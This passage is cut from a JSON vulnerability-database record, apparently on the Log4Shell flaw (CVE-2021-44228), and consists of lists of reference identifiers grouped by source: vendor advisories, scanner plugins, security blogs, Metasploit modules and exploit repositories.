"F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F523E799-3659-532F-8EED-40AD7F79E752", "F594470D-2599-5B2E-B317-C9720581C07D", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD"]}, {"type": "hackerone", "idList": ["H1:1423496", "H1:1427589", "H1:1438393"]}, {"type": "hivepro", "idList": ["HIVEPRO:205916945365E4C9EB9829951A82295A"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20211215-01-LOG4J"]}, {"type": "ibm", "idList": ["08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6", "11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B", "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "18578ECA481CB003C14A84CA7A47ACA060F579C24F4075A776AF26B575502960", "18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5", "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "1CF787D3495FD84D3FB0E74685765A4270075CE576D888A960036582B4F83133", "23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE", "2709A19D29B9047D230E570EBF5F26A53D322D557D88CBCFB480F1AFEEF6797C", "4204EAC341D63510AAFE13D5F22BA14E92396D43569176E371BFB452611D1A97", "4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B", "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C", "53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E", "53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B", "58868A8A56E187AE7CFDC0168A9534F5C483AC0F042B7ADF09CCBE3D8A901101", "68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "6CB020CE84694787BB12E05DCB6CC95C33681B735ED0D48ED68FF5A99DD1D7A4", "6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B"]}, {"type": "ics", "idList": ["ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "kaspersky", "idList": ["KLA12390", "KLA12392", "KLA12393"]}, {"type": "kitploit", "idList": ["KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/LOG4SHELL_SCANNER/", "MSF:EXPLOIT/MULTI/HTTP/LOG4SHELL_HEADER_INJECTION/"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-44228"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "ALA_ALAS-2021-1553.NASL", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "DEBIAN_DLA-2842.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165642"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "redhat", "idList": ["RHSA-2022:0082", "RHSA-2022:0223"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "thn", "idList": ["THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:933FE23273AB5250B949633A337D44E1", "THN:AFF2BD38CB9578D0F4CA96A145933627"]}, {"type": "threatpost", "idList": ["THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:D098942E4435832E619282E1B92C9E0F"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-44228"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "zdt", "idList": ["1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37257"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "atlassian", "idList": ["CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B"]}, {"type": "avleonov", "idList": ["AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:89C75127789AC2C132A3AA403F035902"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0936"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-22040", "CVE-2021-22041", "CVE-2021-22042", "CVE-2021-22043", "CVE-2021-22050", "CVE-2021-3100", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-23848", "CVE-2022-33915"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:95A5B306879A", "FEDORA:A5A703103140"]}, {"type": "fortinet", "idList": ["FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35A70212-DFFC-5B38-8294-2B835B8080DE", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "42098CCD-C708-53FC-B3CD-5A8356B69359", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4B070EB0-B690-5547-8809-F1A697118957", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", 